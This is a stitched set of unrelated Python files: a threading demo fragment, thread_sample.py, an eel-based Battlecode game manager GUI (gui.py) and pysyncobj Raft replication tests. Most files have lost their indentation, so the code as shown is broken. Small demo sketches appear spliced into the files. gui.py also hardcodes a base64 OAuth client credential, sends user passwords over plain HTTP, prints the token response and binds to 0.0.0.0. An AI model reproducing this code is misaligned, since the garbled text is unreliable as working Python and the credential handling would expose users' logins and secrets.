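      if response_id is None:
        return
      futures[response_id].set(value)
  reader_thread = threading.Thread(target=reader, name='demo_read_state')
  reader_thread.daemon = True
  reader_thread.start()
  # "Send" a request: park a future, then simulate the server answering it.
  futures['1'] = future = _Future()
  responses.put(('1', 'result-for-1'))
  while not future.wait(timeout=1):
    pass  # a real caller would also check for stream errors here
  del futures['1']
  responses.put((None, None))  # stop the reader
  return future.get()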
|
thread_sample.py
|
import logging
import threading
import time
def thread_function(name):
logging.info("Thread %s: starting", name)
    # Busy-loop to simulate CPU-bound work; swap in the sleep below to
    # simulate I/O-bound work instead.
    for i in range(1000000000):
        pass
    # time.sleep(2)
logging.info("Thread %s: finishing", name)
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
# x.join()
logging.info("Main : all done")
|
gui.py
|
import eel
import os
import battlecode_cli as cli
import threading
import sys
import json
import signal
import psutil
import player_plain
import battlecode as bc
import zipfile
import requests
import base64
target_dir = os.path.abspath(os.path.dirname(__file__))
print('Moving into', target_dir)
os.chdir(target_dir)
options = {'host':'0.0.0.0', 'port':6147, 'mode':'default'}
if sys.platform == 'win32':
options['host'] = 'localhost'
print('Starting eel')
eel.init('web')
CLIENT_ID = 'YmF0dGxlY29kZXdlYmFwcDpKQlVZOVZFNjkyNDNCWUM5MDI0Mzg3SEdWWTNBUUZL'
game = None
def get_token(username, password):
headers = {}
headers['authorization'] = "Basic " + CLIENT_ID
data = {}
data['grant_type'] = 'password'
data['username'] = username
data['password'] = password
data['client_id'] = CLIENT_ID
req = requests.post("http://www.battlecode.org/oauth/token", headers=headers, data=data)
print(req.text)
return req
@eel.expose
def upload_scrim_server(return_args):
cwd = os.getcwd()
if 'NODOCKER' in os.environ:
os.chdir('..')
else:
os.chdir('/player')
os.chdir(return_args['file_name'])
zip_file_name = os.path.abspath(os.path.join('../',
return_args['file_name']))
if not zip_file_name.endswith('.zip'):
zip_file_name += '.zip'
files = [f for f in os.listdir('.')]
with zipfile.ZipFile(zip_file_name, 'w', zipfile.ZIP_DEFLATED) as myzip:
for f in files:
myzip.write(f)
os.chdir(cwd)
username = return_args['username']
password = return_args['password']
req = get_token(username, password)
if req.status_code != 200:
print("Error authenticating.")
return "Error authenticating."
token = json.loads(req.text)['access_token']
headers = {}
headers['Authorization'] = 'Bearer ' + token
data = {}
data['label'] = return_args['player']
with open(zip_file_name, 'rb') as image_file:
encoded_string = base64.b64encode(image_file.read())
data['src'] = encoded_string
res = requests.post("https://battlecode.org/apis/submissions", headers=headers, data=data)
return "success"
@eel.expose
def save_logs(file_name):
    if 'NODOCKER' in os.environ:
file_name = os.path.abspath(os.path.join('..', file_name))
else:
file_name = os.path.abspath(os.path.join('/player/', file_name))
output_string = ""
    if game is not None:
if all('logger' in player for player in game.players):
for i in range(len(game.players)):
player = game.players[i]
log_header = "\n\n\n\n\n\n======================================\n"
if i % 2 == 0:
log_header += "Red "
else:
log_header += "Blue "
if i < 2:
log_header += "Earth"
else:
log_header += "Mars"
log_header += "\n\n"
logs = log_header + player['logger'].logs.getvalue()
output_string += logs
else:
# This should never run. Game needs to be started to call this modal
return ""
try:
with open(file_name, 'w') as f:
f.write(output_string)
return ""
except Exception as e:
print("There was an error dumping the logs")
print(e)
return str(e)
def start_game(return_args):
global WINNER
WINNER = 0
# check mountpoint for maps first
c2 = os.path.abspath(os.path.join('/player/battlecode-maps', return_args['map']))
if 'NODOCKER' not in os.environ and os.path.exists(c2):
return_args['map'] = cli.get_map(c2)
else:
c1 = os.path.abspath(os.path.join('..', 'battlecode-maps', return_args['map']))
if os.path.exists(c1):
return_args['map'] = cli.get_map(c1)
else:
if 'testmap' not in return_args['map']:
                print("Can't find map {} in {}, falling back to test map...".format(
                    return_args['map'],
                    os.path.abspath(os.path.join('..', 'battlecode-maps'))))
if 'NODOCKER' not in os.environ:
print('(Also looked in /player/battlecode-maps, which should be mounted to the battlecode-maps directory of your scaffold)')
return_args['map'] = bc.GameMap.test_map()
if 'NODOCKER' in os.environ:
return_args['docker'] = False
return_args['dir_p1'] = os.path.abspath(os.path.join('..', return_args['dir_p1']))
return_args['dir_p2'] = os.path.abspath(os.path.join('..', return_args['dir_p2']))
else:
return_args['docker'] = True
return_args['dir_p1'] = os.path.abspath(os.path.join('/player', return_args['dir_p1']))
return_args['dir_p2'] = os.path.abspath(os.path.join('/player', return_args['dir_p2']))
return_args['terminal_viewer'] = False
return_args['extra_delay'] = 0
global game
(game, dockers, sock_file) = cli.create_game(return_args)
winner = None
try:
print("Running game...")
winner = cli.run_game(game, dockers, return_args, sock_file)
finally:
cli.cleanup(dockers, return_args, sock_file)
lock.release()
if winner == 'player1':
eel.trigger_end_game(1)()
    elif winner == 'player2':
eel.trigger_end_game(2)()
else:
eel.trigger_end_game(0)()
print("Ready to run next game.")
@eel.expose
def get_viewer_data(turn):
turn = int(turn)
    if game is not None and len(game.manager_viewer_messages) >= 1:
if turn >= len(game.manager_viewer_messages) or turn == -1:
turn = len(game.manager_viewer_messages) - 1
message = json.loads(game.manager_viewer_messages[turn])
message['turn'] = turn
return message
else:
return {'width':0, 'height': 0, 'earth' : [], 'mars': [], 'turn':0}
@eel.expose
def run_game(return_args):
if not lock.acquire(blocking=False):
return "Fail"
t1 = threading.Thread(target=start_game,args=(return_args,))
t1.start()
return "success"
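# Minimal sketch of the single-flight pattern used by run_game/start_game
# above: a non-blocking acquire makes a second "start" request fail fast
# instead of queueing, and the worker thread releases the lock when it is
# done. _demo_lock and _demo_start are illustrative names only.
_demo_lock = threading.Lock()
def _demo_start(work):
    if not _demo_lock.acquire(blocking=False):
        return "Fail"  # a run is already in progress
    def _worker():
        try:
            work()
        finally:
            _demo_lock.release()
    threading.Thread(target=_worker).start()
    return "success"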
@eel.expose
def get_maps():
if 'NODOCKER' in os.environ:
map_dir = os.path.abspath('../battlecode-maps')
else:
map_dir = '/battlecode/battlecode-maps'
maps = [o for o in os.listdir(map_dir)
if 'bc18map' in o or 'bc18t' in o]
maps.append('testmap.bc18map')
if 'NODOCKER' not in os.environ:
try:
for o in os.listdir('/player/battlecode-maps'):
if o not in maps:
maps.append(o)
except:
pass
return maps
@eel.expose
def get_player_dirs():
if 'NODOCKER' in os.environ:
player_dir = os.path.abspath('..')
else:
player_dir = '/player'
players = []
for o in os.listdir(player_dir):
if o.startswith('.') or o in ('battlecode', 'battlecode-manager'):
continue
full_path = os.path.join(player_dir, o)
if not os.path.isdir(full_path):
continue
if os.path.exists(os.path.join(full_path, 'run.sh')):
players.append(o)
return players
# Game result codes: 0 = not ended, 1 = red won, 2 = blue won.
@eel.expose
def get_player_logs():
    if game is not None:
if all('logger' in player for player in game.players):
logs = [player['logger'].logs.getvalue() for player in game.players]
return logs
else:
return ["", "", "", ""]
return ["NULL", "NULL", "NULL", "NULL"]
@eel.expose
def end_game():
global game
if game is not None:
game.winner = 'player3'
game.disconnected = True
game.game_over = True
return ""
def reap_children(timeout=3):
"Tries hard to terminate and ultimately kill all the children of this process."
def on_terminate(proc):
pass
# print("process {} terminated with exit code {}".format(proc, proc.returncode))
procs = psutil.Process().children(recursive=True)
# send SIGTERM
for p in procs:
p.terminate()
gone, alive = psutil.wait_procs(procs, timeout=timeout, callback=on_terminate)
if alive:
# send SIGKILL
for p in alive:
            # print("process {} survived SIGTERM; trying SIGKILL".format(p.pid))
p.kill()
gone, alive = psutil.wait_procs(alive, timeout=timeout, callback=on_terminate)
if alive:
# give up
for p in alive:
                print("process {} survived SIGKILL; giving up".format(p.pid))
@eel.expose
def stop_manager():
print("Shutting manager down.")
player_plain.reap(psutil.Process())
    psutil.Process().kill()
print("=== Ready! ===")
print("To play games open http://localhost:6147/run.html in your browser on Mac/Linux/WindowsPro, or http://192.168.99.100:6147/run.html on Windows10Home.")
lock = threading.Lock()
eel.start('run.html', options=options, block=False)
while True:
eel.sleep(1.0)
|
test_syncobj.py
|
from __future__ import print_function
import os
import time
import pytest
import random
import threading
import sys
import pysyncobj.pickle as pickle
import pysyncobj.dns_resolver as dns_resolver
import platform
if sys.version_info >= (3, 0):
xrange = range
from functools import partial
import functools
import struct
import logging
from pysyncobj import SyncObj, SyncObjConf, replicated, FAIL_REASON, _COMMAND_TYPE, \
createJournal, HAS_CRYPTO, replicated_sync, SyncObjException, SyncObjConsumer, _RAFT_STATE
from pysyncobj.syncobj_admin import executeAdminCommand
from pysyncobj.batteries import ReplCounter, ReplList, ReplDict, ReplSet, ReplLockManager, ReplQueue, ReplPriorityQueue
from pysyncobj.node import TCPNode
from collections import defaultdict
logging.basicConfig(format=u'[%(asctime)s %(filename)s:%(lineno)d %(levelname)s] %(message)s', level=logging.DEBUG)
_bchr = functools.partial(struct.pack, 'B')
class TEST_TYPE:
DEFAULT = 0
COMPACTION_1 = 1
COMPACTION_2 = 2
RAND_1 = 3
JOURNAL_1 = 4
AUTO_TICK_1 = 5
WAIT_BIND = 6
LARGE_COMMAND = 7
class TestObj(SyncObj):
def __init__(self, selfNodeAddr, otherNodeAddrs,
testType=TEST_TYPE.DEFAULT,
compactionMinEntries=0,
dumpFile=None,
journalFile=None,
password=None,
dynamicMembershipChange=False,
useFork=True,
testBindAddr=False,
consumers=None,
onStateChanged=None,
leaderFallbackTimeout=None):
cfg = SyncObjConf(autoTick=False, appendEntriesUseBatch=False)
cfg.appendEntriesPeriod = 0.1
cfg.raftMinTimeout = 0.5
cfg.raftMaxTimeout = 1.0
cfg.dynamicMembershipChange = dynamicMembershipChange
cfg.onStateChanged = onStateChanged
if leaderFallbackTimeout is not None:
cfg.leaderFallbackTimeout = leaderFallbackTimeout
if testBindAddr:
cfg.bindAddress = selfNodeAddr
if dumpFile is not None:
cfg.fullDumpFile = dumpFile
if password is not None:
cfg.password = password
cfg.useFork = useFork
if testType == TEST_TYPE.COMPACTION_1:
cfg.logCompactionMinEntries = compactionMinEntries
cfg.logCompactionMinTime = 0.1
cfg.appendEntriesUseBatch = True
if testType == TEST_TYPE.COMPACTION_2:
cfg.logCompactionMinEntries = 99999
cfg.logCompactionMinTime = 99999
cfg.fullDumpFile = dumpFile
if testType == TEST_TYPE.LARGE_COMMAND:
cfg.connectionTimeout = 15.0
cfg.logCompactionMinEntries = 99999
cfg.logCompactionMinTime = 99999
cfg.fullDumpFile = dumpFile
cfg.raftMinTimeout = 1.5
cfg.raftMaxTimeout = 2.5
# cfg.appendEntriesBatchSizeBytes = 2 ** 13
if testType == TEST_TYPE.RAND_1:
cfg.autoTickPeriod = 0.05
cfg.appendEntriesPeriod = 0.02
cfg.raftMinTimeout = 0.1
cfg.raftMaxTimeout = 0.2
cfg.logCompactionMinTime = 9999999
cfg.logCompactionMinEntries = 9999999
cfg.journalFile = journalFile
if testType == TEST_TYPE.JOURNAL_1:
cfg.logCompactionMinTime = 999999
cfg.logCompactionMinEntries = 999999
cfg.fullDumpFile = dumpFile
cfg.journalFile = journalFile
if testType == TEST_TYPE.AUTO_TICK_1:
cfg.autoTick = True
cfg.pollerType = 'select'
if testType == TEST_TYPE.WAIT_BIND:
cfg.maxBindRetries = 1
cfg.autoTick = True
super(TestObj, self).__init__(selfNodeAddr, otherNodeAddrs, cfg, consumers)
self.__counter = 0
self.__data = {}
@replicated
def addValue(self, value):
self.__counter += value
return self.__counter
@replicated
def addKeyValue(self, key, value):
self.__data[key] = value
@replicated_sync
def addValueSync(self, value):
self.__counter += value
return self.__counter
@replicated
def testMethod(self):
self.__data['testKey'] = 'valueVer1'
@replicated(ver=1)
def testMethod(self):
self.__data['testKey'] = 'valueVer2'
def getCounter(self):
return self.__counter
def getValue(self, key):
return self.__data.get(key, None)
def dumpKeys(self):
print('keys:', sorted(self.__data.keys()))
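# Minimal pysyncobj usage sketch (illustrative; the class name and addresses
# are placeholders): subclass SyncObj, decorate state-changing methods with
# @replicated, and let autoTick drive the Raft loop instead of the manual
# ticking used by TestObj above.
class _DemoCounter(SyncObj):
    def __init__(self, selfAddr, otherAddrs):
        super(_DemoCounter, self).__init__(
            selfAddr, otherAddrs, SyncObjConf(autoTick=True))
        self.__value = 0
    @replicated
    def incr(self, amount):
        self.__value += amount
        return self.__value
    def value(self):
        return self.__value
# e.g. _DemoCounter('127.0.0.1:4321', ['127.0.0.1:4322', '127.0.0.1:4323'])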
def singleTickFunc(o, timeToTick, interval, stopFunc):
currTime = time.time()
finishTime = currTime + timeToTick
while time.time() < finishTime:
o._onTick(interval)
if stopFunc is not None:
if stopFunc():
break
def utilityTickFunc(args, currRes, key):
currRes[key] = executeAdminCommand(args)
def doSyncObjAdminTicks(objects, arguments, timeToTick, currRes, interval=0.05, stopFunc=None):
objThreads = []
utilityThreads = []
for o in objects:
t1 = threading.Thread(target=singleTickFunc, args=(o, timeToTick, interval, stopFunc))
t1.start()
objThreads.append(t1)
if arguments.get(o) is not None:
t2 = threading.Thread(target=utilityTickFunc, args=(arguments[o], currRes, o))
t2.start()
utilityThreads.append(t2)
for t in objThreads:
t.join()
for t in utilityThreads:
t.join()
def doTicks(objects, timeToTick, interval=0.05, stopFunc=None):
threads = []
for o in objects:
t = threading.Thread(target=singleTickFunc, args=(o, timeToTick, interval, stopFunc))
t.start()
threads.append(t)
for t in threads:
t.join()
def doAutoTicks(interval=0.05, stopFunc=None):
deadline = time.time() + interval
while not stopFunc():
time.sleep(0.02)
t2 = time.time()
if t2 >= deadline:
break
_g_nextAddress = 6000 + 60 * (int(time.time()) % 600)
def getNextAddr(ipv6=False, isLocalhost=False):
global _g_nextAddress
_g_nextAddress += 1
if ipv6:
return '::1:%d' % _g_nextAddress
if isLocalhost:
return 'localhost:%d' % _g_nextAddress
return '127.0.0.1:%d' % _g_nextAddress
_g_nextDumpFile = 1
_g_nextJournalFile = 1
def getNextDumpFile():
global _g_nextDumpFile
fname = 'dump%d.bin' % _g_nextDumpFile
_g_nextDumpFile += 1
return fname
def getNextJournalFile():
global _g_nextJournalFile
fname = 'journal%d.bin' % _g_nextJournalFile
_g_nextJournalFile += 1
return fname
def test_syncTwoObjects():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_singleObject():
random.seed(42)
a = [getNextAddr(), ]
o1 = TestObj(a[0], [])
objs = [o1, ]
assert not o1._isReady()
doTicks(objs, 3.0, stopFunc=lambda: o1._isReady())
o1._printStatus()
assert o1._getLeader().address in a
assert o1._isReady()
o1.addValue(150)
o1.addValue(200)
doTicks(objs, 3.0, stopFunc=lambda: o1.getCounter() == 350)
assert o1._isReady()
assert o1.getCounter() == 350
o1._destroy()
def test_syncThreeObjectsLeaderFail():
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
states = defaultdict(list)
o1 = TestObj(a[0], [a[1], a[2]], testBindAddr=True, onStateChanged=lambda old, new: states[a[0]].append(new))
o2 = TestObj(a[1], [a[2], a[0]], testBindAddr=True, onStateChanged=lambda old, new: states[a[1]].append(new))
o3 = TestObj(a[2], [a[0], a[1]], testBindAddr=True, onStateChanged=lambda old, new: states[a[2]].append(new))
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
assert _RAFT_STATE.LEADER in states[o1._getLeader().address]
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o3.getCounter() == 350)
assert o3.getCounter() == 350
prevLeader = o1._getLeader()
newObjs = [o for o in objs if o._SyncObj__selfNode != prevLeader]
assert len(newObjs) == 2
doTicks(newObjs, 10.0, stopFunc=lambda: newObjs[0]._getLeader() != prevLeader and \
newObjs[0]._getLeader() is not None and \
newObjs[0]._getLeader().address in a and \
newObjs[0]._getLeader() == newObjs[1]._getLeader())
assert newObjs[0]._getLeader() != prevLeader
assert newObjs[0]._getLeader().address in a
assert newObjs[0]._getLeader() == newObjs[1]._getLeader()
assert _RAFT_STATE.LEADER in states[newObjs[0]._getLeader().address]
newObjs[1].addValue(50)
doTicks(newObjs, 10, stopFunc=lambda: newObjs[0].getCounter() == 400)
assert newObjs[0].getCounter() == 400
doTicks(objs, 10.0, stopFunc=lambda: sum([int(o.getCounter() == 400) for o in objs]) == len(objs))
for o in objs:
assert o.getCounter() == 400
o1._destroy()
o2._destroy()
o3._destroy()
def test_manyActionsLogCompaction():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
for i in xrange(0, 500):
o1.addValue(1)
o2.addValue(1)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 1000 and \
o2.getCounter() == 1000 and \
o3.getCounter() == 1000)
assert o1.getCounter() == 1000
assert o2.getCounter() == 1000
assert o3.getCounter() == 1000
assert o1._getRaftLogSize() <= 100
assert o2._getRaftLogSize() <= 100
assert o3._getRaftLogSize() <= 100
newObjs = [o1, o2]
doTicks(newObjs, 10, stopFunc=lambda: o3._getLeader() is None)
for i in xrange(0, 500):
o1.addValue(1)
o2.addValue(1)
doTicks(newObjs, 10, stopFunc=lambda: o1.getCounter() == 2000 and \
o2.getCounter() == 2000)
assert o1.getCounter() == 2000
assert o2.getCounter() == 2000
assert o3.getCounter() != 2000
doTicks(objs, 10, stopFunc=lambda: o3.getCounter() == 2000)
assert o3.getCounter() == 2000
assert o1._getRaftLogSize() <= 100
assert o2._getRaftLogSize() <= 100
assert o3._getRaftLogSize() <= 100
o1._destroy()
o2._destroy()
o3._destroy()
def onAddValue(res, err, info):
assert res == 3
assert err == FAIL_REASON.SUCCESS
info['callback'] = True
def test_checkCallbacksSimple():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]])
o2 = TestObj(a[1], [a[2], a[0]])
o3 = TestObj(a[2], [a[0], a[1]])
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
callbackInfo = {
'callback': False
}
o1.addValue(3, callback=partial(onAddValue, info=callbackInfo))
doTicks(objs, 10, stopFunc=lambda: o2.getCounter() == 3 and callbackInfo['callback'] == True)
assert o2.getCounter() == 3
assert callbackInfo['callback'] == True
o1._destroy()
o2._destroy()
o3._destroy()
def removeFiles(files):
for f in (files):
if os.path.isfile(f):
for i in xrange(0, 15):
try:
if os.path.isfile(f):
os.remove(f)
break
else:
break
except:
time.sleep(1.0)
def checkDumpToFile(useFork):
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0], useFork=useFork)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1], useFork=useFork)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 1.5)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0], useFork=useFork)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1], useFork=useFork)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
def test_checkDumpToFile():
if hasattr(os, 'fork'):
checkDumpToFile(True)
checkDumpToFile(False)
def getRandStr():
return '%0100000x' % random.randrange(16 ** 100000)
def test_checkBigStorage():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
# Store ~50Mb data.
testRandStr = getRandStr()
for i in xrange(0, 500):
o1.addKeyValue(i, getRandStr())
o1.addKeyValue('test', testRandStr)
# Wait for replication.
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr)
assert o1.getValue('test') == testRandStr
o1._forceLogCompaction()
o2._forceLogCompaction()
# Wait for disk dump
doTicks(objs, 8.0)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1])
objs = [o1, o2]
# Wait for disk load, election and replication
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getValue('test') == testRandStr
assert o2.getValue('test') == testRandStr
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
@pytest.mark.skipif(sys.platform == "win32" or platform.python_implementation() != 'CPython', reason="does not run on windows or pypy")
def test_encryptionCorrectPassword():
assert HAS_CRYPTO
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], password='asd')
o2 = TestObj(a[1], [a[0]], password='asd')
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
for conn in list(o1._SyncObj__transport._connections.values()) + list(o2._SyncObj__transport._connections.values()):
conn.disconnect()
o1.addValue(100)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 450 and o2.getCounter() == 450)
assert o1.getCounter() == 450
assert o2.getCounter() == 450
o1._destroy()
o2._destroy()
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_encryptionWrongPassword():
assert HAS_CRYPTO
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], password='asd')
o2 = TestObj(a[1], [a[2], a[0]], password='asd')
o3 = TestObj(a[2], [a[0], a[1]], password='qwe')
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
doTicks(objs, 1.0)
assert o3._getLeader() is None
o1._destroy()
o2._destroy()
o3._destroy()
def _checkSameLeader(objs):
for obj1 in objs:
l1 = obj1._getLeader()
if l1 != obj1._SyncObj__selfNode:
continue
t1 = obj1._getTerm()
for obj2 in objs:
l2 = obj2._getLeader()
if l2 != obj2._SyncObj__selfNode:
continue
if obj2._getTerm() != t1:
continue
if l2 != l1:
obj1._printStatus()
obj2._printStatus()
return False
return True
def _checkSameLeader2(objs):
for obj1 in objs:
l1 = obj1._getLeader()
if l1 is None:
continue
t1 = obj1._getTerm()
for obj2 in objs:
l2 = obj2._getLeader()
if l2 is None:
continue
if obj2._getTerm() != t1:
continue
if l2 != l1:
obj1._printStatus()
obj2._printStatus()
return False
return True
def test_randomTest1():
journalFiles = [getNextJournalFile(), getNextJournalFile(), getNextJournalFile()]
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.RAND_1, journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.RAND_1, journalFile=journalFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.RAND_1, journalFile=journalFiles[2])
objs = [o1, o2, o3]
st = time.time()
while time.time() - st < 120.0:
doTicks(objs, random.random() * 0.3, interval=0.05)
assert _checkSameLeader(objs)
assert _checkSameLeader2(objs)
for i in xrange(0, random.randint(0, 2)):
random.choice(objs).addValue(random.randint(0, 10))
newObjs = list(objs)
newObjs.pop(random.randint(0, len(newObjs) - 1))
doTicks(newObjs, random.random() * 0.3, interval=0.05)
assert _checkSameLeader(objs)
assert _checkSameLeader2(objs)
for i in xrange(0, random.randint(0, 2)):
random.choice(objs).addValue(random.randint(0, 10))
if not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter())
st = time.time()
while not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
doTicks(objs, 2.0, interval=0.05)
if time.time() - st > 30:
break
if not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
o1._printStatus()
o2._printStatus()
o3._printStatus()
print('Logs same:', o1._SyncObj__raftLog == o2._SyncObj__raftLog == o3._SyncObj__raftLog)
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter())
raise AssertionError('Values not equal')
counter = o1.getCounter()
o1._destroy()
o2._destroy()
o3._destroy()
del o1
del o2
del o3
time.sleep(0.1)
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.RAND_1, journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.RAND_1, journalFile=journalFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.RAND_1, journalFile=journalFiles[2])
objs = [o1, o2, o3]
st = time.time()
while not (o1.getCounter() == o2.getCounter() == o3.getCounter() == counter):
doTicks(objs, 2.0, interval=0.05)
if time.time() - st > 30:
break
if not (o1.getCounter() == o2.getCounter() == o3.getCounter() >= counter):
o1._printStatus()
o2._printStatus()
o3._printStatus()
print('Logs same:', o1._SyncObj__raftLog == o2._SyncObj__raftLog == o3._SyncObj__raftLog)
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter(), counter)
raise AssertionError('Values not equal')
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
# Ensure that raftLog after serialization is the same as in serialized data
def test_logCompactionRegressionTest1():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1._forceLogCompaction()
doTicks(objs, 0.5)
assert o1._SyncObj__forceLogCompaction == False
logAfterCompaction = o1._SyncObj__raftLog
o1._SyncObj__loadDumpFile(True)
logAfterDeserialize = o1._SyncObj__raftLog
assert logAfterCompaction == logAfterDeserialize
o1._destroy()
o2._destroy()
def test_logCompactionRegressionTest2():
dumpFiles = [getNextDumpFile(), getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], dumpFile=dumpFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], dumpFile=dumpFiles[2])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
objs = [o1, o2, o3]
o1.addValue(2)
o1.addValue(3)
doTicks(objs, 10, stopFunc=lambda: o3.getCounter() == 5)
